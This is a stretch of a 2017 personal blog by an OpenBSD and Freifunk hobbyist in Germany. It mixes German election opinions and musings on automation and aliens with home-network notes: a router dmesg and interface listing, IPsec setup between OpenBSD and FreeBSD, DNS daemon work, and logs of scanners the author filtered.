You may even lose your job if it's Internet based. Freifunk provides a new
gateway at no cost of limitation to use. You can even use a VPN through
Freifunk that's encrypted noone cares. But it makes you feel safer, if you
do that, so it's good. I often get the feeling people think that we're out
to rip people off which is not the case. We want to blanket Germany with
wifi and run an alternative to what "the others" are selling, and give it
away for free.
I'm majorly peed off that these laws are creating uncertainty and fear, when
it's perfectly legal. I want to provide some links for you:
You are probably reading this from another country and probably don't know
what "fuss" is. Fuss is when you have to beg with society over and over to
bring about something that everyone needs. You probably never heard of this
and if you didn't then you're most likely free'er than us. We need freedoms!
Das Internet darf kein rechtsfreier Raum sein
June 30th, 2017
"The Internet shall not be a lawless space" is the translation of that.
This statement made by german politicians over and over, has a double meaning
and can be interpreted in many ways. Let's look at who are the true masters
of the Internet. It's nerds. It's programmers who spend countless hours
programming to make some protocol work. And not just that but these programmers
return to their own work to make a Request For Comment or other documentation
for others to implement their ideas.
Into the picture comes the politician
and the lawyer, and the soldier and the cop. These guys historically held
power in societies and find themselves in a power-vacuum on the "Internet".
In fact these people don't know very much other than pulling a trigger or
confusing the general public with extravagant words that usually have double
meanings and are easily confused. They for the lawyer and politician part
are tricksters. Now these people want control of "EVERYTHING" including
the 'net. But they are lazy to learn for themselves, something that the
common nerd is good at, so they make laws to inhibit the nerds. This is what
it's all about. It's a trick. To spoil something that nerds worked hard at.
My message to the tricksters. You're trying to unseat gods who created
everything. Do you think you can maintain everything once you have unseated
the gods? You don't know, but you're doing it. And if it fails we'll just
go back to the times when there was no Internet. You'll outlaw it, isn't
that the ultimate revenge for your own ignorance of not understanding
something that is way more important than you'll ever be? It's happened
everywhere and it'll continue to happen. Censorship and suppression.
I don't need to study law to be a great programmer. You want to put me inside
a box and say "you can't do that, you can't do this" by applying synthetic
laws on a programmer. Programmers don't work that way, when they feel
inhibited they lose interest real quick and go on to the next thing that may
give them more playing field. We're not in-the-box type people. We may
start off in the box, but eventually when we master something we can eliminate
these thresholds easily.
What we really need is freedom. And it has dawned on all the powerholders that
if they take away your freedom with law, they can control you. But they are
working off a set of programs that some geek designed for them who they then
canned. So their protocols are outdated, and won't work in new domains. If
you put law to technology, we lose the race against nature. You'll royally
screw yourself if you do that. So to sum up.. the politicians and lawyers
want laws so they stay in power, at the same time the cops and soldiers want
to be above the law to stay in power, and the nerds are just feeling the
pressure and rolling their eyes in disgust.
Who I'm voting for in 2017
July 3rd, 2017
Germany has an election this year. Democracy at it's finest. I'm voting for
"Die Linke" and I'll tell you why. The CDU/CSU has no pledges, meaning you can
vote for them but you don't know what you're voting for. Also under Merkel
that party has seen to the rich getting richer and the poor losing money. The
other party, the SPD, is not extreme enough for me. They are somewhat on the
right track, but since they are in a coalition government with the CDU/CSU this
term we haven't really benefited from them. Then there is the green party.
These guys have become switch hitters with the so-called jamaica coalition.
It's called jamaica coalition because of the party colours black, yellow and
green, which is a coalition between CDU, FDP and greens respectively. I do
like them, but not enough. The other parties in my view are not worth
mentioning.
What draws me to "Die Linke"? It's not so much the personalities of the
politicians but rather their mandate. They are for radical changes in minimum
wage for example. Meaning the poor would be getting more. And then they also
want to tax the rich heavier, which means the money that the poor get would be
coming from the rich. Also I want to keep the option open for a Red-Red-Green
coalition. With my vote I'm putting pressure on the SPD to accept a coalition
with "Die Linke" if they want to rule, if they don't want to rule no loss.
Unfortunately I'm part of the reason that the rich get richer. Because I've
been working for underpaid wages for the last 7 years while my ex-boss got
rich by selling his investment to a larger company. This is exactly how the
rich get richer, they do start-up's and pretend there is no money, then they
sell for millions and you won't hear from them for a decade or so. I'm actually
not getting much of a pension (perhaps 50 EUR a month) which means I'll be
in poverty at old age, which means now is the time to work toward the sane goal
of a basic income, which makes sense becuase all the money that the rich have
made is re-invested into robotics to keep human labour low, and they get even
richer. I'm very sorry to know this.
My new Network Map 2017
July 4th, 2017
Yesterday I was laying new cabling and pulled out some old cabling, this is
what my network looks like now:
I wrote a donation for F3 Netze for 25 EUR.
On Friday I'm bringing the transfer to the bank. Unfortunately F3 Netze hasn't
opened a Paypal account yet, but I was going to the bank anyhow.
I also pledged 44 EUR to someone else in the Freifunk Organization for a yearly
discount on a server. He has to check his finances first though. Slowly the
freifunk hobby is starting to cost money, which is great, but I have to watch
it not to spend too much on this hobby. I'm gonna write up a budget soon.
If anyone of freifunk-schweinfurt is reading this, I have also pledged money to
you so make means available that I can help you (paypal, bank account #'s, etc).
Nuclear Powerstations should not be on the Net
July 8th, 2017
I'm gonna say it again. Get off the 'net, you have no business there and it's
too risky. Same goes for nuclear bombs. They should not be on the Internet.
You don't even have to think this through... hackers are everywhere, nothing is
safe.
Google, Apple and co, how does that work?
July 9th, 2017
As you know these two named companies habe been backtaxed by the EU with a lot
of money for evading taxes. Apple itself has 200+ billion in cash and wouldn't
really need to care if they have to pay 13 billion EUR in backtaxes. However
these companies will continue their tricks and the EU will continue to say
that they broke laws. So what to do? What's gonna happen? For one the EU
has no real competitor against these companies that offer similar products and
services. And if the EU tax tolls become too heavy Google and Apple may decide
not to pay up. What will happen then?
Let's look to times when Google had
problems with China. What they did was move to Hong Kong and out of China and
made use of the dual law system in Hong Kong. Could they do the same here in
europe? What if they made use of Brexit and invested heavily into Britain
and made european users use the british installation. At that point they would
be out of jurisdiction from EU governments and if they cozy up to the British
government it could be worthwhile.
I think it would be worthwhile for the EU to build its own google-like system
much like airbus was made in response to boeing for airplanes and space systems.
Just how is it gonna be flourishing with all these laws? Time will tell.
Purchased two books from Amazon
July 9th, 2017
I have purchased two books:
The Linux Programming Interface: A Linux and UNIX System Programming Handbook - Michael Kerrisk, this one was on recommendation by Habbie in #dns
Ansible: From Beginner to Pro - Michael Heap
Thank to all who helped!
When you're at a crossroad
July 10th, 2017
Then take a picture.
Food for the human people!
July 10th, 2017
MMMMMMH!
On Friday the UNIX timestamp turns 1500000000
July 10th, 2017
Here is the exact time and some significant others.
beta$ date -r 1500000000
Fri Jul 14 04:40:00 CEST 2017
beta$ date -r 1400000000
Tue May 13 18:53:20 CEST 2014
beta$ date -r 1000000000
Sun Sep 9 03:46:40 CEST 2001
Here are some others in the future:
beta$ date -r 2000000000
Wed May 18 05:33:20 CEST 2033
beta$ date -r 1600000000
Sun Sep 13 14:26:40 CEST 2020
For those that don't know the timestamp is seconds since January 1st 1970.
Delphinusdnsd is pledged
July 11th, 2017
I just put the code in. I had to disable the TTL code that shows how many
hops a requester went through for the query to my daemon. This is because
pledge doesn't know about pledging IPPROTO_IP setsockopts yet, it seems.
All is good the new code is in production on chi.goldflipper.de for the
zone delphinusdns.org. Yay!
New surveillance powers in the Netherlands
July 12th, 2017
This webserver is located in the Netherlands. A new bill gives the dutch
security
services rights to spy on every traffic. Since I'm currently not
encrypting my webserver this means little privacy for my readers. However
the powers won't be in effect until Jan. 1st, 2018, so there is some time
to prepare. In the worst case scenario I'll just leave this VPS. Sorry.
Hamburg G20
July 13th, 2017
It is the federal government who invited the G20 to Hamburg. Hamburg is a
host to conferences but the damage done was envisionable pre-conference.
So it should be the federal government who pays up for damages done. A lot
of looting, shooting and burning happened there, but I don't blame Hamburg
I blame the federal government.
Putting the car on ice
July 16th, 2017
I'm getting second thoughts about getting a car in August. I'll hold off for
now while I'm not sure what to do. Partially I'm scared of driving again.
America, you're more than great...
July 17th, 2017
When I grew up, I immersed myself around American culture. Hip-Hop. It was
the thing and as a youth living in Canada it was thrilling. However I'm a
little stunned why America is seemingly falling. Is it that entertainment
has corrupted the driving force behind Americas momentum? I personally had
a second chance in life, not many people have that, but it is maybe worth
exploring the "be all you can be" and I don't mean joining the army but
striving for personal best.
You don't have to be rich, you don't have to be
the smartest, but when you're trying to stay away from intoxicants, trying
for realisable goals then trying is worth the effort. Eventually people have to
figure out that doing X is not going to raise them, it may be a wrong way to
seek personal freedom. Wow, now that I started this article I realise how
hard it is to write. I'm not going to tell you to seek god, or stay away from
drugs. You know the answer deep down in your heart anyhow. But seek yourself.
I could tell you all the things that are wrong
with American society, but what can I tell you about what's great? There is
a lot. Hip Hop music is great, but you had to find the great moments. Hip
Hop often prepared people not to be sarcastic on their surroundings but to
cope with difficult times. Seek your strength, you have it.
I can't tell you any hip hop artists to listen to, I personally get a lot of
strength from 2pac remakes these days, but I'm going to leave you with one
of my favourite statements that I want to pass to people looking for a way...
"You gotta go in, to get out".
I guess what that means is seek your soul, and once you've found it escape the
situation that's making you uncomfortable. It's within you, and not to be
found in the stars. Once you know yourself the stars aren't so distant, you
know.
Brainstorm why aliens haven't been found yet
July 18th, 2017
As the number one reason I think aliens haven't been found yet is because
they are in the process of conquest and don't go looking for us until they are
ready to take us in.
We're not really a wise species, we're quick to draw conclusions, we are
conflict species, we like war and destruction.. all the reason to stay away
from us
Either aliens are superior to us, at which point they grant us freedom, or
they are inferior to us at which point they are in hiding from us.
Perhaps radio signals is not the right way to communicate, it bears dangers
Then there may also be a reason that we don't need aliens in our leaders views.
We're so corrupt in our own resources that we don't want others to come along.
This is a human trait. Maybe it's more about us than it is about them.
Provided a patch to OpenBSD ifconfig(8)
July 19th, 2017
After a lot of monkeying around on my router venus which had its pflow
interface crippled by the config, I produced this patch:
basically we're not trying to resolve the flowsrc or flowdst, so I added a flag
to the resolver to treat this as a raw IP or IPv6.
Difficulties in recruiting ICT specialists reported in the EU
July 19th, 2017
In this document eurostat shows
that 41% of enterprises reported vacancies. Those positions can be filled, if
these enterprises made in-roads and changed their systems, is my idea on this.
Ie. a business traditionally hiring Windows specialists should know that there
is a large Linux following that exists and if they changed their systems to
incorporate Linux programs they would have better chances at filling the
vacancy. This is just my observation. Here in Schweinfurt there is 100 jobs
vacant. It's always been 100 jobs, for as long as I looked. Half of those
are probably fake-jobs, the other half are often specialised jobs around
Windows. I know my own frustration at finding the right job there. Recently
I applied to a Linux job. I'm keeping my fingers crossed.
Purchased a used Ubiquiti Edgerouter
July 22th, 2017
I purchased a used Edgerouter from someone on IRC. Before I made the deal
I asked on the openbsd-misc mailing list and it seems I got people on a good
day:
The Edgerouter ER-8 is supported, thank goodness. Apparently the ER-8 costs
289 EUR new and I got it for 180 EUR. Hopefully it's in good condition.
Newly planned network at home
July 23th, 2017
With zeta my new OpenBSD firewall that I'll probably get by wednesday I have
simplified my network a little. From the start zeta will use 7 ports which is
amazing. Here is what area52 which is what I call my apartment will look like:
I'm doing a lot more cabling and vlan'ing instead of vxlan'ing which is routed.
With that I'm hoping to gain back stability and robustness.
Puzzled by the Ross 128 story
July 23th, 2017
In this
article at soylentnews the scientists at arecibo are blaming geostationary
satellites for the Ross 128 signals. However I'm puzzled by this. For one
the dish at Arecibo is not very movable, in fact its 100% immovable and the
science done on it is pretty much outbound 90 degrees from the flat earth.
Sure they can perhaps move the receiver by 5% or so...
This means that the geostationary satellites are always in view of the
arecibo dish, and if that's the case they surely must have detected the
geostationary satellites earlier. Why is this even news then? I think
something fishy may be going on. It smells like a cover-up.
Dmesg from zeta.centroid.eu
July 27th, 2017
Zeta is my new firewall/router at home. It's slower than the APU1 that I
had in its place before but it gave a lot more ports (+5) so I'M very happy
about that. Also it's a MIPS64 which should keep the footprint of crackers
lower that would be able to break into this host which is a plus.
Copyright (c) 1982, 1986, 1989, 1991, 1993
The Regents of the University of California. All rights reserved.
Copyright (c) 1995-2017 OpenBSD. All rights reserved. https://www.OpenBSD.org
OpenBSD 6.1-current (GENERIC.MP) #0: Sat Jul 22 21:28:07 UTC 2017
visa@octeon:/usr/src/sys/arch/octeon/compile/GENERIC.MP
real mem = 2147483648 (2048MB)
avail mem = 2113355776 (2015MB)
mainbus0 at root
cpu0 at mainbus0: CN61xx CPU rev 0.1 800 MHz, Software FP emulation
cpu0: cache L1-I 512KB D 8KB 64 way, L2 1024KB 8 way
cpu1 at mainbus0: CN61xx CPU rev 0.1 800 MHz, Software FP emulation
cpu1: cache L1-I 512KB D 8KB 64 way, L2 1024KB 8 way
clock0 at mainbus0: int 5
iobus0 at mainbus0
simplebus0 at iobus0: "soc"
octciu0 at simplebus0
cn30xxsmi0 at simplebus0
cn30xxsmi1 at simplebus0
com0 at simplebus0: ns16550a, 64 byte fifo
com0: console
com1 at simplebus0: ns16550a, 64 byte fifo
octmmc0 at simplebus0
sdmmc0 at octmmc0: 8-bit, mmc high-speed
octuctl0 at iobus0 base 0x118006f000000 irq 56
ehci0 at octuctl0
usb0 at ehci0: USB revision 2.0
uhub0 at usb0 configuration 1 interface 0 "Octeon EHCI root hub" rev 2.00/1.00 addr 1
ohci0 at octuctl0, version 1.0
usb1 at ohci0: USB revision 1.0
uhub1 at usb1 configuration 1 interface 0 "Octeon OHCI root hub" rev 1.00/1.00 addr 1
octrng0 at iobus0 base 0x1400000000000 irq 0
cn30xxgmx0 at iobus0 base 0x1180008000000
cnmac0 at cn30xxgmx0: SGMII, address 24:a4:3c:06:9f:12
ukphy0 at cnmac0 phy 4: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
cnmac1 at cn30xxgmx0: SGMII, address 24:a4:3c:06:9f:13
ukphy1 at cnmac1 phy 5: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
cnmac2 at cn30xxgmx0: SGMII, address 24:a4:3c:06:9f:14
ukphy2 at cnmac2 phy 6: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
cnmac3 at cn30xxgmx0: SGMII, address 24:a4:3c:06:9f:15
ukphy3 at cnmac3 phy 7: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
cn30xxgmx1 at iobus0 base 0x1180010000000
cnmac4 at cn30xxgmx1: SGMII, address 24:a4:3c:06:9f:16
ukphy4 at cnmac4 phy 0: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
cnmac5 at cn30xxgmx1: SGMII, address 24:a4:3c:06:9f:17
ukphy5 at cnmac5 phy 1: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
cnmac6 at cn30xxgmx1: SGMII, address 24:a4:3c:06:9f:18
ukphy6 at cnmac6 phy 2: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
cnmac7 at cn30xxgmx1: SGMII, address 24:a4:3c:06:9f:19
ukphy7 at cnmac7 phy 3: Generic IEEE 802.3u media interface, rev. 3: OUI 0x180361, model 0x0004
/dev/ksyms: Symbol table not valid.
umass0 at uhub0 port 1 configuration 1 interface 0 "SanDisk Ultra USB 3.0" rev 2.10/1.00 addr 2
umass0: using SCSI over Bulk-Only
scsibus0 at umass0: 2 targets, initiator 0
sd0 at scsibus0 targ 1 lun 0: SCSI4 0/direct removable \
serial.07815591241023103380
sd0: 118464MB, 512 bytes/sector, 242614272 sectors
scsibus1 at sdmmc0: 2 targets, initiator 0
sd1 at scsibus1 targ 1 lun 0: SCSI2 0/direct removable
sd1: 3776MB, 512 bytes/sector, 7733248 sectors
vscsi0 at root
scsibus2 at vscsi0: 256 targets
softraid0 at root
scsibus3 at softraid0: 256 targets
boot device: sd0
root on sd0a (08e1253cf19e0676.a) swap on sd0b dump on sd0b
WARNING: No TOD clock, believing file system.
WARNING: CHECK AND RESET THE DATE!
cpu1 launched
I have given it a 128 GB USB stick as its disk even though the internal flash
card is detected as sd1. The people involved in this architecture are super!
They really should be congratulated to make this architecture happen. I did
have some problems with threaded programs on this firewall but I moved those to
my amd64 router venus (the program was BIND 9.10.5)... Here is the listing of
ports, I have utilized all eight:
cnmac0: flags=8843 mtu 1500
lladdr 24:a4:3c:06:9f:12
description: eth4 - FritzBox LTE
index 1 priority 0 llprio 3
media: Ethernet autoselect (100baseTX full-duplex)
status: active
inet 192.168.78.1 netmask 0xffffff00 broadcast 192.168.78.255
cnmac1: flags=8843 mtu 1526
lladdr 24:a4:3c:06:9f:13
description: eth5 - Telekom VDSL
index 2 priority 0 llprio 3
media: Ethernet autoselect (1000baseT full-duplex)
status: active
inet 192.168.16.1 netmask 0xffffff00 broadcast 192.168.16.255
cnmac2: flags=8b43 mtu 1500
lladdr 24:a4:3c:06:9f:14
description: eth6 - mercury
index 3 priority 0 llprio 3
media: Ethernet autoselect (1000baseT full-duplex)
status: active
inet 192.168.70.1 netmask 0xffffff00 broadcast 192.168.70.255
inet6 fe80::26a4:3cff:fe06:9f14%cnmac2 prefixlen 64 scopeid 0x3
inet6 2001:db8::121 prefixlen 64
cnmac3: flags=8b43 mtu 1500
lladdr 24:a4:3c:06:9f:15
description: eth7 - venus
index 4 priority 0 llprio 3
media: Ethernet autoselect (1000baseT full-duplex)
status: active
inet 192.168.42.1 netmask 0xffffff00 broadcast 192.168.42.255
cnmac4: flags=8843 mtu 1500
lladdr 24:a4:3c:06:9f:16
description: eth0 - Access Point to uranus
index 5 priority 0 llprio 3
media: Ethernet autoselect (1000baseT full-duplex)
status: active
inet 192.168.179.1 netmask 0xffffff00 broadcast 192.168.179.255
inet6 fe80::26a4:3cff:fe06:9f16%cnmac4 prefixlen 64 scopeid 0x5
inet6 2001:db8:0:10::111 prefixlen 64
cnmac5: flags=8843 mtu 1500
lladdr 24:a4:3c:06:9f:17
description: eth1 - AREA52U uplink
index 6 priority 0 llprio 3
media: Ethernet autoselect (100baseTX full-duplex)
status: active
inet 192.168.43.1 netmask 0xffffff00 broadcast 192.168.43.255
cnmac6: flags=8b43 rdomain 2 mtu 1500
lladdr 24:a4:3c:06:9f:18
description: eth2 - AREA52U host from bridge
index 7 priority 0 llprio 3
media: Ethernet autoselect (1000baseT full-duplex)
status: active
cnmac7: flags=8b43 rdomain 3 mtu 1500
lladdr 24:a4:3c:06:9f:19
description: eth3 - AREA52U B.A.T.M.A.N.
index 8 priority 0 llprio 3
media: Ethernet autoselect (1000baseT full-duplex)
status: active
Notice the order between cnmac0 and eth0 differ, hence I have labeled the ports.
There also exists some vlan's and bridges that I bridge batman and other stuff
together and pass it on to venus or mercury. Cheers!
Most rich people don't get rich in a vacuum. They employ people to make their
money. Well all that is gonna change with artificial intelligence and robots.
There might be 10% employees of what they used to employ, in the near future.
The rest will be laid off. Those 10% will be high technologists who work on
fixing the robots and computer systems. The hard work will be conducted by
robots.
When people are ready to leave earth it will likely be the rich. They'll
settle on the moon, they'll settle mars and they'll mine the asteroid belt,
with you guessed it, robots. So nothing has changed except that living on
mars makes you instantly poor unless you have high technology to help you
get the resources that a human being needs.
What's going to happen to the poor people on earth? We'll be living in
ghettos most likely, bunched together in big cities like sardines with
promises of being picked in a lottery to go to space. We'll be monitored
24/7 in our 80 square meter apartments and medicated when there is the
slightest hint of depression. When people get drift that the rich are
using all the resources to get off this planet and leaving us behind
there'll be chaos.
We have to think about whether this is the future we want. Because this is
what's happening. We are the people farms. What is a worthwhile pasttime
when AI outsmarts us? What is a worthwhile profession when robots outdo us?
Do you think we'll all end up playing tennis and bone each other 24/7? Get.
Real. I'm majorly pissed off really, not because I don't get to go to the
moon, no, because there is no meaningful work that I can persue that isn't
already done by a machine.
A 2 class system will erupt, us and them and it's all lies and trickery. The
movies 2001 Space Oddisey and Terminator are not warnings signs, we've already
passed them. They are here.
I tip my hat to SHA2017
August 06th, 2017
This morning a hacker scanned my delphinusdnsd server from SHA2017, why?
Aug 6 05:06:45 chi delphinusdnsd[38628]: on descriptor 11 interface \
"78.47.14.22" header from 151.216.93.11 has no question, drop
Aug 6 05:06:45 chi delphinusdnsd[38628]: question on descriptor 11 \
interface "78.47.14.22" from 151.216.93.11, did not have question of 1 \
replying format error
Sorry about the incomplete log. I don't have much traffic so I watch the log.
The IP in question is dns for the sha2017.camp. domain.
;; QUESTION SECTION:
;11.93.216.151.in-addr.arpa. IN PTR
;; AUTHORITY SECTION:
93.216.151.in-addr.arpa. 600 IN SOA ns1.sha2017.camp. \
root.sha2017.camp. 2016121900 10800 3600 604800 3600
Just to let hackers know. I'm not rich. I don't have connections. So you're
not exactly a Robin Hood if you're hacking me. SHA2017 conference's home
page is found here.
SOHCAHTOA.bc
August 7th, 2017
I have made a helper define, with the help of #openbsd on efnet, on SOHCAHTOA
functions. In order to solve this problem, I use the following defines with bc:
beta$ bc -l sohcahtoa.bc
toa(35, 65)
28.30075576600637815925
seems to be the answer on the problem noted above. Yay.
Donated to OpenBSD
August 8th, 2017
I have donated 35 EUR to OpenBSD for jca@ who helped me on the misc@ mailing
list. I asked Theo who gets the money to buy jca@ a drink next time they
meet. Thanks a million, or 35 EUR! ;-).
It's actually been a perfect summer
August 10th, 2017
Just wanted to say I didn't find this summer too hot, or too cold. It is
just perfect, for me. I'm looking forward to my vacation which will be
end of month.
Dead Bird on my Balcony
August 11th, 2017
Today, just as I was going to hang up my laundry I noticed a dead bird on my
balcony under the drying rack. I kinda freaked out because I had to throw it
out with the garbage and didn't give it a burial. At least it's getting
incinerated in a few weeks time. That's sorta like a cremation. I didn't
make a picture because the bird doesn't deserve to be shown in its dead state.
I think it was a bird from the tit family but it was clad in a sparrows
feathers, I was 100% sure it wasn't a sparrow though.
So here is to you, dead bird, I raise my glass (of diet coke) to you!
Rest in Peace!
It would make a difference to me
August 12th, 2017
If Germany had it's own space program it would make a difference to me.
Currently Germany is doing space science and exploration under the ESA umbrella
which is many european nations. The launch sites are in Kazakhstan and in
Kourou. So every satellite that ever goes up is shipped to those far places
where we can't see a launch. In fact we're entirely oblivious to it, we don't
know what's going on. And we don't have everything we need, if we did have
that we'd have a space race. If a politician in Germany wants to win he'll
say "I promise, before this decade is out (before 2030) we'll put a man on
the moon and return him safely" and it would make that person get elected.
Imagine that! If Germany started a space programme today from literally
scratch and made it happen within 13 years. German technology, german people
and german dreams. Yes it's a little nationalist thinking but so what?
Think of the things that Germany doesn't have! And what we could have.
IKE between OpenBSD and FreeBSD
August 15th, 2017
I got IPSEC working between OpenBSD 6.1 and FreeBSD 10.3 with the openiked port.
The policy management is not right on FreeBSD and I had to tune it with an
extra "ipsec-fixup" file. Here is what I did:
root@psi:~ # cat ipsec-fixup.setkey
spdflush;
spdadd 108.61.211.139/32 159.203.29.105/32 any -P out ipsec esp/tunnel/\
108.61.211.139-159.203.29.105/require;
spdadd 159.203.29.105/32 108.61.211.139/32 any -P out ipsec esp/tunnel/\
159.203.29.105-108.61.211.139/require;
root@psi:~ #
and I had to modify iked rc.d startup file to add this routine:
start_postcmd="iked_poststart"
...
iked_poststart()
{
if [ -f /root/ipsec-fixup.setkey ] ; then
(sleep 15 && /sbin/setkey -f /root/ipsec-fixup.setkey) &
fi
}
That will fix the IPSEC on every start/restart. If this helped you at all
Cheers!
I'm waiting four more years for a car
August 16th, 2017
It's 2017 now. BMW has revealed in 2016
that the first autonomous car will be available in 2021. That would make me
45 years of age and with a bit of luck I'll be a bit richer too. A
self-driving autonomous car is what I want as I don't trust my own driving
skills, and I simply don't want to drive. I want to use computers til the
eyes bleed and not worry about a car ride after. So I'm waiting until 2021.
Sorry Renault, you had a good car, I would have bought it had I been able to
drive it.
AVM FRITZ!WLAN Repeater 300E supported in LEDE
August 17th, 2017
When I found out I couldn't use my repeater 300E anymore I was very sad
because it wasn't that old. I've since found out recently that LEDE has
support for it. I'm going to replace my repeater 1750E with the 300E as
I think it'll be safer. I'll do this next week.
For those curious on how my hallway part of my network looks like now I
have made a photo for you.
That's the new router in action. "Cables everywhere" -- "Kabelsalat ist gut!".
Don't attack my 1000 Friends
August 17th, 2017
Why security certifications for programs don't work
August 18th, 2017
We know from the past that when something was to be secure it had a
certification. This doesn't work with software, much more the line
of "nothing is guaranteed, it's all illusion", fits the best. In
the old days if someone broke a promise the lord would hit them on
the head. Today that's too draconian. So what to do? It's up to
people themselves what they want to invest into. Lies and deceit
are everywhere. Just try to stay out of harms way.
Switched my password convention
August 19th, 2017
For 20+ years I've been using passwords the "wrong" way. P45Sw0-d may have
been such a password. This worked well in 1997 when DES passwords were still
used but it's 20 years later and password hashes allow a lot more characters.
In fact in my "Thinking Security" book from Steve Bellovin, he refers to this
little comic from XKCD. So I'm stopping
the 11 character passwords on my passwords which usally are written down and
I have replaced it with
this script to generate me some hints. There is 59461417443039374961
possible combinations (~44 bits of entropy according to the XKCD) for four
up-to-8-character passwords.
Now let's do some math. The previous way I may have
been using upper and lower case characters (52), numbers (10), and 16 or so
ascii signs. For 11 character passwords that gives 78^11 entropy or
650190514836423555072 possible combination (brute force). Surprisingly this
is only a magnitude of 10x more than what my 4 words out of /usr/share/dict/words
give, so they are quite similar, and I have an easier time remembering it. (I hope) I'll give it a shot we'll see.
A small shell script game around Pythagoras Theorem
August 21st, 2017
I made this little game. Perhaps your kids will like it...
#!/bin/sh
while : ; do
echo '
Enjoy!
This is as close as I got to the Eclipse
August 21st, 2017
In the USA people were able to see an eclipse today. Here I tried looking at
the sun but there was no moon that I could see.
Oh well had I a telescope and had I been in Oregon or some place then I would
probably have looked for Regulus during the eclipse.
My depiction of the Tree of Life
August 22nd, 2017
This tree has been in my daydreams a lot, finally I put it down. It depicts
the galaxies virgo local group and local cluster that form a tree and the
spiral galaxies as flowers of this tree. I call this the Qabala tree which
I recently learned about, but no offense!
One thing that stands out is the 9 shaped spiral galaxies that are using a
sort of fibbonacci sequence to order themselves.. awesome.
Chirag Upreti made this Impossible Photo
August 22nd, 2017
During yesterdays USA Eclipse, the photographer Chirag Upreti made this
impossible photo. Why is it impossible? Because usually the sky is blue
and the sun is so strong that this star can't be seen, in August. Regulus is
in the constellation Leo and in August is somewhat behind the sun.
Congratulations on a great shot! Thanks!
Politics: Not the Union, not the SPD, and not the Greens...
August 23rd, 2017
Germany has elections in exactly 1 month and 1 day. I'm not voting for the
above mentioned parties. I'm also not keen on AFD or FDP. That really
leaves only one party. I'm still considering (strongly) voting for DieLinke.
The parties applying for rule in Berlin don't bring about too much change,
and change is what we need. I said earlier that if any person went up and
said "I'm going to make a manned german space program" that I'd vote for them
because that's exactly the sort of change I'm looking for. Die Linke doesn't
promise that but while we are supposed to bunker down on the regular then we
may as well go with them.
Donated 15 EUR to F3 Netze
August 23rd, 2017
I donated 15 EUR to F3 Netze since they opened a Paypal method. I had to try
it out. This brings donations this year to F3 Netze to 40 EUR.
Changed nameserver for delphinusdns.org
August 23rd, 2017
I have changed chi.goldflipper.de to omega.virgostar.net for the
delphinusdns.org zone. In one week I'll change the nameserver
supercluster.virgostar.net to psi.virgostar.net for all my remaining domains.
Hopefully it'll work nicely. I have also made a -current delphinusdnsd the
master on omega, before it was a hidden master and only did AXFR. Now it
answers queries. Habbie (person on #dns) told me that I don't echo RD bit
upon a refused, which I put on my TODO to fix.
Added double the RAM and double the SSD to Omega
August 24th, 2017
My VPS provider vultr.com which I use for the host omega.virgostar.net, allows
one to upgrade plans on the fly. So I did. I don't pay more than I did before
, which is around $10 USD/mo and I have 2 GB RAM and 20 GB more drive space.
When I give up supercluster in October or November, because of new surveillance
laws in the Netherlands, I'll have everything stowed into omega. I'm also
giving up chi.goldflipper.de at around the same time so I'll go down to 2 VPS
for the time being. Those are the big plans.
137.226.113.0/24 can't lookup my DNS anymore
August 25th, 2017
A particular University has been probing my DNS, over and over again. Until
I sent them an email informing them that they have been filtered and that they
are spying.
/var/log/all.0.gz:Aug 24 13:42:18 omega delphinusdnsd[8574]: request on \
descriptor 16 interface "108.61.211.139" from 137.226.113.7 \
(ttl=0, region=255) for "_sips._tcp.virgostar.net." type=SRV(33) class=1, \
edns0, answering "NXDOMAIN" (53/130)
/var/log/all.0.gz:Aug 24 13:42:18 omega delphinusdnsd[8574]: request on \
descriptor 16 interface "108.61.211.139" from 137.226.113.27 \
(ttl=0, region=255) for "_sip._udp.virgostar.net." type=SRV(33) class=1, \
edns0, answering "NXDOMAIN" (52/129)
I asked them whether they wanted to call me because they looked up SRV records
for SIP and Jabber...
Now pretend you have a house and you sit in it. Then someone comes to your door
and windows and looks in to see if you have left them open. And does this
repeatedly, with a different mask every time. Is that _not_ a little intrusive and scary? I call it spying. And that's exactly what
comsys.rwth-aachen.de are doing. BTW I'm not spying because I only look at
my own windows to see if anyone is looking in. Also we don't know what
happens to the data that Uni Aachen are collecting. Chances are it's ending
up in government hands.
So for the last night this is what my logs say about this subnet:
Aug 24 21:52:39 omega delphinusdnsd[29533]: UDP connection refused on \
descriptor 17 interface "108.61.211.139" from 137.226.113.12 (ttl=0, \
region=255) replying REFUSED, filter policy
And it'll stay on. On the other DNS server I put them in a pf filter.
Ordered three books
August 28th, 2017
I'm on vacation this week and partially next week. So I've ordered some
reading material.
Steganographie in WLANs: Design und Implementierung - Kuehne, Tobias
Introduction to Modern Cryptography (Chapman & Hall/CRC Cryptography and Network Security Series) - Katz, Jonathan,Lindell, Yehuda
Mastering Bitcoin: Unlocking Digital Cryptocurrencies - Antonopoulos, Andreas
Lots of books involving encryption. No I don't have anything to hide ;-) this
is pure educational.
Change has begun
August 30th, 2017
This morning I replaced the supercluster.virgostar.net nameserver with the
psi.virgostar.net nameserver for all my domains. As I'm moving away from
supercluster and will wrap up its participation in my network in November
likely. I'm freeing up money by the end of the year and the reason that
prompted this change was the new surveillance laws in the Netherlands that
go into effect January 1st, 2018. I'll be long gone then and will think
twice about my privacy when entering dutch territory again.
Please welcome this website to Germany
August 30th, 2017
I have moved this website to Germany. This is related to the last article
which I have found myself just doing it. One more service off supercluster.
The last leg of Summer 2017
September 1st, 2017
We have about 3 more weeks of summer left (officially). Last year I turned
up the heat around October 4th, 2016. So I'm hoping to be doing that this
year as well. Of course if it gets cold earlier I'll have to turn the heat
up earlier. In about three weeks Germany has a federal election. So politics
are gonna make the people crazy the next few weeks. Have a safe and happy
September everybody!
Cancelled supercluster for September 17, 2017
September 2nd, 2017
I have cancelled supercluster.virgostar.net for September 17th, 2017. After
moving everything off it, it will be cancelled 2 weeks earlier than planned.
That's just the billing cycle though. It's been a fun three years!
Wrote a patch for babel routing daemon
September 3rd, 2017
We noticed in freifunk franken that sometimes there is receive buffer overruns.
